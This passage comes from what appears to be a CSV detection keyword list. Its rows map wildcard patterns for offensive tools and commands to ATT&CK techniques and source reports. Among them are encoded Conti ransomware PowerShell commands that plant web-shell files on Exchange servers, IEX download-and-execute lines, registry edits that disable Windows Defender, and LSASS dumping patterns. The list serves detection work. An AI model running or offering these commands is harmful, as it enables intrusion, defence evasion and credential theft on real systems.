tools,https://github.com/samratashok/nishang,1,1,N/A,N/A,10,7849,2360,2023-09-05T07:54:08Z,2014-05-19T11:48:24Z -*powerpwn.powerdump*,offensive_tool_keyword,power-pwn,An offensive and defensive security toolset for Microsoft 365 Power Platform,T1078 - T1078.004 - T1136 - T1136.001 - T1021 - T1021.003 - T1114 - T1114.002,TA0003 - TA0004 - TA0005 - TA0001,N/A,N/A,Exploitation tools,https://github.com/mbrg/power-pwn,1,0,N/A,10,4,360,34,2023-09-12T12:44:44Z,2022-06-14T11:40:21Z -*powerpwn_tests*,offensive_tool_keyword,power-pwn,An offensive and defensive security toolset for Microsoft 365 Power Platform,T1078 - T1078.004 - T1136 - T1136.001 - T1021 - T1021.003 - T1114 - T1114.002,TA0003 - TA0004 - TA0005 - TA0001,N/A,N/A,Exploitation tools,https://github.com/mbrg/power-pwn,1,0,N/A,10,4,360,34,2023-09-12T12:44:44Z,2022-06-14T11:40:21Z -*power-pwn-main*,offensive_tool_keyword,power-pwn,An offensive and defensive security toolset for Microsoft 365 Power Platform,T1078 - T1078.004 - T1136 - T1136.001 - T1021 - T1021.003 - T1114 - T1114.002,TA0003 - TA0004 - TA0005 - TA0001,N/A,N/A,Exploitation tools,https://github.com/mbrg/power-pwn,1,1,N/A,10,4,360,34,2023-09-12T12:44:44Z,2022-06-14T11:40:21Z -*PowerSCCM.ps1*,offensive_tool_keyword,PowerSCCM,PowerSCCM - PowerShell module to interact with SCCM deployments,T1059.001 - T1018 - T1072 - T1047,TA0005 - TA0003 - TA0002,N/A,N/A,Exploitation tools,https://github.com/PowerShellMafia/PowerSCCM,1,1,N/A,8,4,301,110,2022-01-22T15:30:56Z,2016-01-28T00:20:22Z -*PowerSCCM.psd1*,offensive_tool_keyword,PowerSCCM,PowerSCCM - PowerShell module to interact with SCCM deployments,T1059.001 - T1018 - T1072 - T1047,TA0005 - TA0003 - TA0002,N/A,N/A,Exploitation tools,https://github.com/PowerShellMafia/PowerSCCM,1,1,N/A,8,4,301,110,2022-01-22T15:30:56Z,2016-01-28T00:20:22Z -*PowerSCCM.psm1*,offensive_tool_keyword,PowerSCCM,PowerSCCM - PowerShell module to interact with SCCM deployments,T1059.001 - T1018 - T1072 - T1047,TA0005 - TA0003 - TA0002,N/A,N/A,Exploitation tools,https://github.com/PowerShellMafia/PowerSCCM,1,1,N/A,8,4,301,110,2022-01-22T15:30:56Z,2016-01-28T00:20:22Z -*PowerSCCM-master*,offensive_tool_keyword,PowerSCCM,PowerSCCM - PowerShell module to interact with SCCM deployments,T1059.001 - T1018 - T1072 - T1047,TA0005 - TA0003 - TA0002,N/A,N/A,Exploitation tools,https://github.com/PowerShellMafia/PowerSCCM,1,1,N/A,8,4,301,110,2022-01-22T15:30:56Z,2016-01-28T00:20:22Z -*powerseb/PowerExtract*,offensive_tool_keyword,powerextract,This tool is able to parse memory dumps of the LSASS process without any additional tools (e.g. Debuggers) or additional sideloading of mimikatz. It is a pure PowerShell implementation for parsing and extracting secrets (LSA / MSV and Kerberos) of the LSASS process,T1003 - T1055 - T1003.001 - T1055.012,TA0007 - TA0002,N/A,N/A,Credential Access,https://github.com/powerseb/PowerExtract,1,1,N/A,N/A,1,99,14,2023-07-19T14:24:41Z,2021-12-11T15:24:44Z -*powerseb/PowerExtract*,offensive_tool_keyword,powerextract,This tool is able to parse memory dumps of the LSASS process without any additional tools (e.g. Debuggers) or additional sideloading of mimikatz. It is a pure PowerShell implementation for parsing and extracting secrets (LSA / MSV and Kerberos) of the LSASS process,T1003 - T1055 - T1003.001 - T1055.012,TA0007 - TA0002,N/A,N/A,Credential Access,https://github.com/powerseb/PowerExtract,1,1,N/A,N/A,1,99,14,2023-07-19T14:24:41Z,2021-12-11T15:24:44Z -*PowerSharpBinaries*,offensive_tool_keyword,PowerSharpPack,Many useful offensive CSharp Projects wraped into Powershell for easy usage,T1059.001 - T1027 - T1055.012,TA0002 - TA0005,N/A,N/A,Exploitation tools,https://github.com/S3cur3Th1sSh1t/PowerSharpPack,1,1,N/A,10,10,1257,284,2023-03-01T17:10:43Z,2020-04-06T16:34:52Z -*PowerSharpPack.ps1*,offensive_tool_keyword,PowerSharpPack,Many useful offensive CSharp Projects wraped into Powershell for easy usage,T1059.001 - T1027 - T1055.012,TA0002 - TA0005,N/A,N/A,Exploitation tools,https://github.com/S3cur3Th1sSh1t/PowerSharpPack,1,1,N/A,10,10,1257,284,2023-03-01T17:10:43Z,2020-04-06T16:34:52Z -*PowerSharpPack-master*,offensive_tool_keyword,PowerSharpPack,Many useful offensive CSharp Projects wraped into Powershell for easy usage,T1059.001 - T1027 - T1055.012,TA0002 - TA0005,N/A,N/A,Exploitation tools,https://github.com/S3cur3Th1sSh1t/PowerSharpPack,1,1,N/A,10,10,1257,284,2023-03-01T17:10:43Z,2020-04-06T16:34:52Z -*PowerShdll*,offensive_tool_keyword,PowerShdll,Run PowerShell with dlls only Does not require access to powershell.exe as it uses powershell automation dlls. PowerShdll can be run with: rundll32.exe. installutil.exe. regsvcs.exe. regasm.exe. regsvr32.exe or as a standalone executable.,T1059 - T1218 - T1216 - T1053 - T1118,TA0002 - TA0008 - TA0003,N/A,N/A,Defense Evasion,https://github.com/p3nt4/PowerShdll,1,1,N/A,N/A,10,1649,263,2021-03-17T02:02:23Z,2016-07-15T00:08:32Z -*powershell *C:\Users\Public\*.exe* forfiles.exe /p *\system32 *.exe**,offensive_tool_keyword,Slackor,A Golang implant that uses Slack as a command and control server,T1059.003 - T1071.004 - T1562.001,TA0002 - TA0010 - TA0011,N/A,N/A,C2,https://github.com/Coalfire-Research/Slackor,1,0,N/A,10,10,451,108,2023-02-25T03:35:15Z,2019-06-18T16:01:37Z -*powershell *Get-EventLog -LogName security -Newest 500 | where {$_.EventID -eq 4624} | format-list -property * | findstr*,offensive_tool_keyword,Earth Lusca Operations Tools,Earth Lusca Operations Tools and commands,T1548.002 - T1098.004 - T1583.001 - T1583.004 - T1583.006 - T1595.002 - T1560.001 - T1547.012 - T1059.001 - T1059.005 - T1059.006 - T1059.007 - T1584.004 - T1584.006 - T1543.003 - T1140 - T1482 - T1189 - T1567.002 - T1190 - T1210 - T1574.002 - T1036.005 - T1112 - T1027 - T1027.003 - T1588.001 - T1588.002 - T1003.001 - T1003.006 - T1566.002 - T1057 - T1090 - T1018 - T1053 - T1608.001 - T1218.005 - T1016 - T1053 - T1049 - T1033 - T1016 - T1049 - T1016 - T1218.001 - T1016 - T1049 - T1033 - T1007 - T1218.005,TA0001 - TA0002 - TA0003,cobaltstrike - mimikatz - powersploit - shadowpad - winnti,Earth Lusca,Exploitation tools,https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*powershell -c *\windows\system32\inetsrv\appcmd.exe list apppool /@t:*,greyware_tool_keyword,powershell,NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.,T1069 - T1021 - T1136 - T1018,TA0007 - TA0003 - TA0002 - TA0001,N/A,N/A,Credential Access,https://github.com/Pennyw0rth/NetExec,1,0,Checking For Hidden Credentials With Appcmd.exe,10,6,525,54,2023-10-03T21:19:24Z,2023-09-08T15:36:00Z -*powershell -enc cwBjACAALQBwAGEAdABoACAAIgBjADoAXABwAHIAbwBnAHIAYQBtAGQAYQB0AGEAXABhAC4AdAB4AHQAIgAgAC0AdgBhAGwAdQBlACAAJABhACAALQBGAG8AcgBjAGUAOwBzAGMAIAAtAHAAYQB0AGgAIABjADoAXABpAG4AZQB0AHAAdQBiAFwAdwB3AHcAcgBvAG8AdABcAGEAcwBwAG4AZQB0AF8AYwBsAGkAZQBuAHQAXAB0AGUAcwB0AC4AdAB4AHQAIAAtAHYAYQBsAHUAZQAgACgAaQBlAHgAKAAnAG4AbAB0AGUAcwB0ACAALwBkAGMAbABpAHMAdAA6ACcAKQB8AE8AdQB0AC0AUwB0AHIAaQBuAGcAKQA=*,offensive_tool_keyword,Conti Ranwomware,Conti Ransomware Proxyshell PowerShell command #5,T1059.003 - T1486 - T1140 - T1083 - T1490 - T1106 - T1135 - T1027 - T1057 - T1055.001 - T1021.002 - T1018 - T1489 - T1016 - T1049 - T1080,TA0002 - TA0010 - TA0011 - TA0009 - TA0007 - TA0008 - TA0001,Conti ransomware - TrickBot,N/A,Exploitation tools,https://news.sophos.com/en-us/2021/09/03/conti-affiliates-use-proxyshell-exchange-exploit-in-ransomware-attacks/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*powershell -enc cwBjACAALQBwAGEAdABoACAAIgBjADoAXABwAHIAbwBnAHIAYQBtAGQAYQB0AGEAXABhAC4AdAB4AHQAIgAgAC0AdgBhAGwAdQBlACAAJABhACAALQBGAG8AcgBjAGUAOwBzAGMAIAAtAHAAYQB0AGgAIABjADoAXABpAG4AZQB0AHAAdQBiAFwAdwB3AHcAcgBvAG8AdABcAGEAcwBwAG4AZQB0AF8AYwBsAGkAZQBuAHQAXAB0AGUAcwB0AC4AdAB4AHQAIAAtAHYAYQBsAHUAZQAgACgAaQBlAHgAKAAnAG4AZQB0ACAAZwByAG8AdQBwACAAIgBkAG8AbQBhAGkAbgAgAGMAbwBtAHAAdQB0AGUAcgBzACIAIAAvAGQAbwBtAGEAaQBuACcAKQB8AE8AdQB0AC0AUwB0AHIAaQBuAGcAKQA=*,offensive_tool_keyword,Conti Ranwomware,Conti Ransomware Proxyshell PowerShell command #5,T1059.003 - T1486 - T1140 - T1083 - T1490 - T1106 - T1135 - T1027 - T1057 - T1055.001 - T1021.002 - T1018 - T1489 - T1016 - T1049 - T1080,TA0002 - TA0010 - TA0011 - TA0009 - TA0007 - TA0008 - TA0001,Conti ransomware - TrickBot,N/A,Exploitation tools,https://news.sophos.com/en-us/2021/09/03/conti-affiliates-use-proxyshell-exchange-exploit-in-ransomware-attacks/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*powershell -enc cwBjACAALQBwAGEAdABoACAAYwA6AFwAaQBuAGUAdABwAHUAYgBcAHcAdwB3AHIAbwBvAHQAXABhAHMAcABuAGUAdABfAGMAbABpAGUAbgB0AFwAdABlAHMAdAAuAHQAeAB0ACAALQB2AGEAbAB1AGUAIAAoAGkAZQB4ACgAJwBsAHMAIABjADoAXABpAG4AZQB0AHAAdQBiAFwAdwB3AHcAcgBvAG8AdABcAGEAcwBwAG4AZQB0AF8AYwBsAGkAZQBuAHQAXAAnACkAfABPAHUAdAAtAFMAdAByAGkAbgBnACkA*,offensive_tool_keyword,Conti Ranwomware,Conti Ransomware Proxyshell PowerShell command #2,T1059.003 - T1486 - T1140 - T1083 - T1490 - T1106 - T1135 - T1027 - T1057 - T1055.001 - T1021.002 - T1018 - T1489 - T1016 - T1049 - T1080,TA0002 - TA0010 - TA0011 - TA0009 - TA0007 - TA0008 - TA0001,Conti ransomware - TrickBot,N/A,Exploitation tools,https://news.sophos.com/en-us/2021/09/03/conti-affiliates-use-proxyshell-exchange-exploit-in-ransomware-attacks/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*powershell -enc cwBjACAALQBwAGEAdABoACAAYwA6AFwAaQBuAGUAdABwAHUAYgBcAHcAdwB3AHIAbwBvAHQAXABhAHMAcABuAGUAdABfAGMAbABpAGUAbgB0AFwAdABlAHMAdAAuAHQAeAB0ACAALQB2AGEAbAB1AGUAIAB0AGUAcwBlAHQA*,offensive_tool_keyword,Conti Ranwomware,Conti Ransomware Proxyshell PowerShell command #6,T1059.003 - T1486 - T1140 - T1083 - T1490 - T1106 - T1135 - T1027 - T1057 - T1055.001 - T1021.002 - T1018 - T1489 - T1016 - T1049 - T1080,TA0002 - TA0010 - TA0011 - TA0009 - TA0007 - TA0008 - TA0001,Conti ransomware - TrickBot,N/A,Exploitation tools,https://news.sophos.com/en-us/2021/09/03/conti-affiliates-use-proxyshell-exchange-exploit-in-ransomware-attacks/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*powershell -enc dwBoAG8AYQBtAGkA*,offensive_tool_keyword,Conti Ranwomware,Conti Ransomware Proxyshell PowerShell command #1,T1059.003 - T1486 - T1140 - T1083 - T1490 - T1106 - T1135 - T1027 - T1057 - T1055.001 - T1021.002 - T1018 - T1489 - T1016 - T1049 - T1080,TA0002 - TA0010 - TA0011 - TA0009 - TA0007 - TA0008 - TA0001,Conti ransomware - TrickBot,N/A,Exploitation tools,https://news.sophos.com/en-us/2021/09/03/conti-affiliates-use-proxyshell-exchange-exploit-in-ransomware-attacks/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*powershell -enc JABhAD0AIgBQAEMAVgBBAEkARgBCAGgAWgAyAFUAZwBUAEcARgB1AFoAMwBWAGgAWgAyAFUAOQBJAGsATQBqAEkAaQBCAEUAWgBXAEoAMQBaAHoAMABpAGQASABKADEAWgBTAEkAZwBkAG0ARgBzAGEAVwBSAGgAZABHAFYAUwBaAFgARgAxAFoAWABOADAAUABTAEoAbQBZAFcAeAB6AFoAUwBJAGcASgBUADQATgBDAGoAdwBsAFEAQwBCAEoAYgBYAEIAdgBjAG4AUQBnAFQAbQBGAHQAWgBYAE4AdwBZAFcATgBsAFAAUwBKAFQAZQBYAE4AMABaAFcAMAB1AFIARwBsAGgAWgAyADUAdgBjADMAUgBwAFkAMwBNAGkASQBDAFUAKwBEAFEAbwA4AEoAVQBBAGcAUwBXADEAdwBiADMASgAwAEkARQA1AGgAYgBXAFYAegBjAEcARgBqAFoAVAAwAGkAVQAzAGwAegBkAEcAVgB0AEwAawBsAFAASQBpAEEAbABQAGcAMABLAFAAQwBWAEEASQBFAGwAdABjAEcAOQB5AGQAQwBCAE8AWQBXADEAbABjADMAQgBoAFkAMgBVADkASQBsAE4ANQBjADMAUgBsAGIAUwBJAGcASgBUADQATgBDAGoAdwBsAFEAQwBCAEoAYgBYAEIAdgBjAG4AUQBnAFQAbQBGAHQAWgBYAE4AdwBZAFcATgBsAFAAUwBKAFQAZQBYAE4AMABaAFcAMAB1AFUAbgBWAHUAZABHAGwAdABaAFMANQBUAFoAWABKAHAAWQBXAHgAcABlAG0ARgAwAGEAVwA5AHUATABrAFoAdgBjAG0AMQBoAGQASABSAGwAYwBuAE0AdQBRAG0AbAB1AFkAWABKADUASQBpAEEAbABQAGcAMABLAFAASABOAGoAYwBtAGwAdwBkAEMAQgB5AGQAVwA1AGgAZABEADAAaQBjADIAVgB5AGQAbQBWAHkASQBqADQATgBDAG4AQgB5AGIAMwBSAGwAWQAzAFIAbABaAEMAQgB6AGQASABKAHAAYgBtAGMAZwBSAFgAaABqAGEARwBGAHUAWgAyAFYAUwBkAFcANQAwAGEAVwAxAGwASwBDAGsATgBDAG4AcwBOAEMAZwBsAHkAWgBYAFIAMQBjAG0ANABnAGMAeQA1AFUAWgBYAGgAMABMAGwAUgB2AFUAMwBSAHkAYQBXADUAbgBLAEMAawA3AEQAUQBwADkARABRAHAAdwBjAG0AOQAwAFoAVwBOADAAWgBXAFEAZwBkAG0AOQBwAFoAQwBCAEUAWQBYAFIAaABZAG0ARgB6AFoAUwBoAE4AWgBXADEAdgBjAG4AbABUAGQASABKAGwAWQBXADAAZwBiAFMAeABDAGEAVwA1AGgAYwBuAGwARwBiADMASgB0AFkAWABSADAAWgBYAEkAZwBZAGkAawBOAEMAbgBzAE4AQwBnAGsASgBiAFMANQBRAGIAMwBOAHAAZABHAGwAdgBiAGkAQQA5AEkARABBADcARABRAG8ASgBDAFcASQB1AFIARwBWAHoAWgBYAEoAcABZAFcAeABwAGUAbQBVAG8AYgBTAGsANwBEAFEAcAA5AEQAUQBwAHcAYwBtADkAMABaAFcATgAwAFoAVwBRAGcAZABtADkAcABaAEMAQgBEAFgAMABOAHMAYQBXAE4AcgBLAEcAOQBpAGEAbQBWAGoAZABDAEIAegBaAFcANQBrAFoAWABJAHMASQBFAFYAMgBaAFcANQAwAFEAWABKAG4AYwB5AEIAbABLAFEAMABLAGUAdwAwAEsAQwBRAGwAQwBlAFgAUgBsAFcAMQAwAGcAVQB5AEEAOQBJAEYATgA1AGMAMwBSAGwAYgBTADUARABiADIANQAyAFoAWABKADAATABrAFoAeQBiADIAMQBDAFkAWABOAGwATgBqAFIAVABkAEgASgBwAGIAbQBjAG8AUgBYAGgAagBhAEcARgB1AFoAMgBWAFMAZABXADUAMABhAFcAMQBsAEsAQwBrAHAATwB3ADAASwBDAFEAbABOAFoAVwAxAHYAYwBuAGwAVABkAEgASgBsAFkAVwAwAGcAYgBTAEEAOQBJAEcANQBsAGQAeQBCAE4AWgBXADEAdgBjAG4AbABUAGQASABKAGwAWQBXADAAbwBVAHkAawA3AEQAUQBvAEoAQwBVAEoAcABiAG0ARgB5AGUAVQBaAHYAYwBtADEAaABkAEgAUgBsAGMAaQBCAGkASQBEADAAZwBiAG0AVgAzAEkARQBKAHAAYgBtAEYAeQBlAFUAWgB2AGMAbQAxAGgAZABIAFIAbABjAGkAZwBwAE8AdwAwAEsAQwBRAGwARQBZAFgAUgBoAFkAbQBGAHoAWgBTAGgAdABMAEcASQBwAE8AdwAwAEsARABRAHAAOQBEAFEAbwA4AEwAMwBOAGoAYwBtAGwAdwBkAEQANABOAEMAagB4AG8AZABHADEAcwBQAGcAMABLAFAARwBaAHYAYwBtADAAZwBhAFcAUQA5AEkAbQBaAHYAYwBtADAAaQBJAEgASgAxAGIAbQBGADAAUABTAEoAegBaAFgASgAyAFoAWABJAGkASQBEADQATgBDAGoAeABoAGMAMwBBADYAVgBHAFYANABkAEUASgB2AGUAQwBCAHkAZABXADUAaABkAEQAMABpAGMAMgBWAHkAZABtAFYAeQBJAGkAQgBKAFIARAAwAGkAYwB5AEkAZwBWAG0ARgBzAGQAVwBVADkASQBpAEkAZwBhAFcANQB3AGQAWABRAGcAYwAzAFIANQBiAEcAVQA5AEkAbQBKAHYAYwBtAFIAbABjAGoAbwB3AGMASABnAGkATAB6ADQATgBDAGoAeABoAGMAMwBBADYAUQBuAFYAMABkAEcAOQB1AEkARQBsAEUAUABTAEoARABJAGkAQgB5AGQAVwA1AGgAZABEADAAaQBjADIAVgB5AGQAbQBWAHkASQBpAEIAVQBaAFgAaAAwAFAAUwBJAGkASQBFADkAdQBRADIAeABwAFkAMgBzADkASQBrAE4AZgBRADIAeABwAFkAMgBzAGkASQBDADgAKwBEAFEAbwA4AEwAMgBaAHYAYwBtADAAKwBEAFEAbwA4AEwAMgBKAHYAWgBIAGsAKwBEAFEAbwA4AEwAMgBoADAAYgBXAHcAKwAiADsAJABhAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJAC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABhACkAKQA7AHMAYwAgAC0AcABhAHQAaAAgACIAYwA6AFwAcAByAG8AZwByAGEAbQBkAGEAdABhAFwAYQAuAHQAeAB0ACIAIAAtAHYAYQBsAHUAZQAgACQAYQAgAC0ARgBvAHIAYwBlADsAcwBjACAALQBwAGEAdABoACAAYwA6AFwAaQBuAGUAdABwAHUAYgBcAHcAdwB3AHIAbwBvAHQAXABhAHMAcABuAGUAdABfAGMAbABpAGUAbgB0AFwAdABlAHMAdAAuAHQAeAB0ACAALQB2AGEAbAB1AGUAIAAoAGkAZQB4ACgAJwBsAHMAIABjADoAXABwAHIAbwBnAHIAYQBtAGQAYQB0AGEAXAAnACkAfABPAHUAdAAtAFMAdAByAGkAbgBnACkA*,offensive_tool_keyword,Conti Ranwomware,Conti Ransomware Proxyshell PowerShell command #3,T1059.003 - T1486 - T1140 - T1083 - T1490 - T1106 - T1135 - T1027 - T1057 - T1055.001 - T1021.002 - T1018 - T1489 - T1016 - T1049 - T1080,TA0002 - TA0010 - TA0011 - TA0009 - TA0007 - TA0008 - TA0001,Conti ransomware - TrickBot,N/A,Exploitation tools,https://news.sophos.com/en-us/2021/09/03/conti-affiliates-use-proxyshell-exchange-exploit-in-ransomware-attacks/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*powershell -enc QwBvAHAAeQAtAEkAdABlAG0AIAAtAHAAYQB0AGgAIABjADoAXABwAHIAbwBnAHIAYQBtAGQAYQB0AGEAXABhAC4AdAB4AHQAIAAtAEQAZQBzAHQAaQBuAGEAdABpAG8AbgAgACIAQwA6AFwAUAByAG8AZwByAGEAbQAgAEYAaQBsAGUAcwBcAE0AaQBjAHIAbwBzAG8AZgB0AFwARQB4AGMAaABhAG4AZwBlACAAUwBlAHIAdgBlAHIAXABWADEANQBcAEYAcgBvAG4AdABFAG4AZABcAEgAdAB0AHAAUAByAG8AeAB5AFwAbwB3AGEAXABhAHUAdABoAFwAYwB1AHIAcgBlAG4AdABcAHQAaABlAG0AZQBzAFwAUgBlAHMAbwB1AHIAYwBlAEgAYQBuAGQAbABlAHIALgBhAHMAcAB4ACIAIAAtAEYAbwByAGMAZQA7AHMAYwAgAC0AcABhAHQAaAAgAGMAOgBcAGkAbgBlAHQAcAB1AGIAXAB3AHcAdwByAG8AbwB0AFwAYQBzAHAAbgBlAHQAXwBjAGwAaQBlAG4AdABcAHQAZQBzAHQALgB0AHgAdAAgAC0AdgBhAGwAdQBlACAAKABpAGUAeAAoACcAbABzACAAIgBDADoAXABQAHIAbwBnAHIAYQBtACAARgBpAGwAZQBzAFwATQBpAGMAcgBvAHMAbwBmAHQAXABFAHgAYwBoAGEAbgBnAGUAIABTAGUAcgB2AGUAcgBcAFYAMQA1AFwARgByAG8AbgB0AEUAbgBkAFwASAB0AHQAcABQAHIAbwB4AHkAXABvAHcAYQBcAGEAdQB0AGgAXABjAHUAcgByAGUAbgB0AFwAdABoAGUAbQBlAHMAXAAiACcAKQB8AE8AdQB0AC0AUwB0AHIAaQBuAGcAKQA=*,offensive_tool_keyword,Conti Ranwomware,Conti Ransomware Proxyshell PowerShell command #4,T1059.003 - T1486 - T1140 - T1083 - T1490 - T1106 - T1135 - T1027 - T1057 - T1055.001 - T1021.002 - T1018 - T1489 - T1016 - T1049 - T1080,TA0002 - TA0010 - TA0011 - TA0009 - TA0007 - TA0008 - TA0001,Conti ransomware - TrickBot,N/A,Exploitation tools,https://news.sophos.com/en-us/2021/09/03/conti-affiliates-use-proxyshell-exchange-exploit-in-ransomware-attacks/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*powershell IEX (New-Object Net.WebClient).DownloadString(*) Get-NetComputer -FullData *,offensive_tool_keyword,Earth Lusca Operations Tools,Earth Lusca Operations Tools and commands,T1548.002 - T1098.004 - T1583.001 - T1583.004 - T1583.006 - T1595.002 - T1560.001 - T1547.012 - T1059.001 - T1059.005 - T1059.006 - T1059.007 - T1584.004 - T1584.006 - T1543.003 - T1140 - T1482 - T1189 - T1567.002 - T1190 - T1210 - T1574.002 - T1036.005 - T1112 - T1027 - T1027.003 - T1588.001 - T1588.002 - T1003.001 - T1003.006 - T1566.002 - T1057 - T1090 - T1018 - T1053 - T1608.001 - T1218.005 - T1016 - T1053 - T1049 - T1033 - T1016 - T1049 - T1016 - T1218.001 - T1016 - T1049 - T1033 - T1007 - T1218.005,TA0001 - TA0002 - TA0003,cobaltstrike - mimikatz - powersploit - shadowpad - winnti,Earth Lusca,Exploitation tools,https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*powershell IEX (New-Object Net.WebClient).DownloadString*.ps1*Get-NetComputer -FullData*,offensive_tool_keyword,Earth Lusca Operations Tools,Earth Lusca Operations Tools and commands,T1548.002 - T1098.004 - T1583.001 - T1583.004 - T1583.006 - T1595.002 - T1560.001 - T1547.012 - T1059.001 - T1059.005 - T1059.006 - T1059.007 - T1584.004 - T1584.006 - T1543.003 - T1140 - T1482 - T1189 - T1567.002 - T1190 - T1210 - T1574.002 - T1036.005 - T1112 - T1027 - T1027.003 - T1588.001 - T1588.002 - T1003.001 - T1003.006 - T1566.002 - T1057 - T1090 - T1018 - T1053 - T1608.001 - T1218.005 - T1016 - T1053 - T1049 - T1033 - T1016 - T1049 - T1016 - T1218.001 - T1016 - T1049 - T1033 - T1007 - T1218.005,TA0001 - TA0002 - TA0003,cobaltstrike - mimikatz - powersploit - shadowpad - winnti,Earth Lusca,Exploitation tools,https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*powershell Invoke-WebRequest http*.bat *,offensive_tool_keyword,Zloader,Zloader Installs Remote Access Backdoors and Delivers Cobalt Strike,T1059 - T1220 - T1566.001 - T1059.005 - T1218.011 - T1562.001 - T1204,TA0002 - TA0008 - TA0006 - TA0001 - TA0010 - TA0003,N/A,N/A,Exploitation tools,https://news.sophos.com/en-us/2022/01/19/zloader-installs-remote-access-backdoors-and-delivers-cobalt-strike/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*Powershell LDAPWordlistHarvester*,offensive_tool_keyword,LDAPWordlistHarvester,A tool to generate a wordlist from the information present in LDAP in order to crack passwords of domain accounts.,T1210.001 - T1087.003 - T1110,TA0001 - TA0006 - TA0007,N/A,N/A,Credential Access,https://github.com/p0dalirius/LDAPWordlistHarvester,1,0,N/A,5,3,218,14,2023-10-01T21:12:10Z,2023-09-22T10:10:10Z -*powershell New-ItemProperty -Path *HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender* -Name DisableAntiSpyware -Value 1 -PropertyType DWORD -Force*,greyware_tool_keyword,powershell,Defense evasion technique In order to avoid detection at any point of the kill chain. attackers use several ways to disable anti-virus. disable Microsoft firewall and clear logs.,T1562.001 - T1562.002 - T1070.004,TA0007 - TA0040 - TA0005,N/A,N/A,Defense Evasion,N/A,1,0,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -*powershell -nop -exec bypass -EncodedCommand SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AMQAyADcALgAwAC4AMAAuADEAOgAyADAANAAxADIALwAnACkAOwAgAC4AXAByAGMAbABvAG4AZQBtAGEAbgBhAGcAZQByAC4AcABzADEA*,offensive_tool_keyword,Conti Ranwomware,Conti Ransomware Proxyshell PowerShell command #14,T1059.003 - T1486 - T1140 - T1083 - T1490 - T1106 - T1135 - T1027 - T1057 - T1055.001 - T1021.002 - T1018 - T1489 - T1016 - T1049 - T1080,TA0002 - TA0010 - TA0011 - TA0009 - TA0007 - TA0008 - TA0001,Conti ransomware - TrickBot,N/A,Exploitation tools,https://news.sophos.com/en-us/2021/09/03/conti-affiliates-use-proxyshell-exchange-exploit-in-ransomware-attacks/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*powershell*Uninstall-WindowsFeature -Name Windows-Defender-GUI*,greyware_tool_keyword,powershell,Windows Defender tampering technique ,T1562.001,TA0005 - TA0040,N/A,N/A,Defense Evasion,https://thedfirreport.com/2023/04/03/malicious-iso-file-leads-to-domain-wide-ransomware/,1,0,N/A,10,8,N/A,N/A,N/A,N/A -*Powershell.exe -windowstyle hidden -nop -ExecutionPolicy Bypass -Commmand *C:\Users\*\AppData\Roaming\*,greyware_tool_keyword,powershell,Adversaries may attempt to execute powershell script from known accessible location,T1059.001 - T1036 - T1216,TA0002 - TA0006,N/A,N/A,Exploitation Tools,N/A,1,0,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -*powershell.exe -exec bypass -noni -nop -w 1 -C*,greyware_tool_keyword,powershell,command pattern used by crackmapexec by default A swiss army knife for pentesting networks,T1210 T1570 T1021 T1595 T1592 T1589 T1590 ,N/A,N/A,N/A,POST Exploitation tools,https://github.com/Porchetta-Industries/CrackMapExec,1,0,High risk of false positive,N/A,10,7678,1595,2023-09-09T14:19:36Z,2015-08-14T14:11:55Z -*powershell.exe -noni -nop -w 1 -enc *,greyware_tool_keyword,powershell,command pattern used by crackmapexec by default A swiss army knife for pentesting networks,T1210 T1570 T1021 T1595 T1592 T1589 T1590 ,N/A,N/A,N/A,POST Exploitation tools,https://github.com/byt3bl33d3r/CrackMapExec,1,0,High risk of false positive,N/A,10,7678,1595,2023-09-09T14:19:36Z,2015-08-14T14:11:55Z -*powershell.exe -noninteractive -executionpolicy bypass ipconfig /all*,offensive_tool_keyword,Conti Ranwomware,Conti Ransomware Proxyshell PowerShell command #8,T1059.003 - T1486 - T1140 - T1083 - T1490 - T1106 - T1135 - T1027 - T1057 - T1055.001 - T1021.002 - T1018 - T1489 - T1016 - T1049 - T1080,TA0002 - TA0010 - TA0011 - TA0009 - TA0007 - TA0008 - TA0001,Conti ransomware - TrickBot,N/A,Exploitation tools,https://news.sophos.com/en-us/2021/09/03/conti-affiliates-use-proxyshell-exchange-exploit-in-ransomware-attacks/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*powershell.exe -noninteractive -executionpolicy bypass ps lsass*,offensive_tool_keyword,Conti Ranwomware,Conti Ransomware Proxyshell PowerShell command #11,T1059.003 - T1486 - T1140 - T1083 - 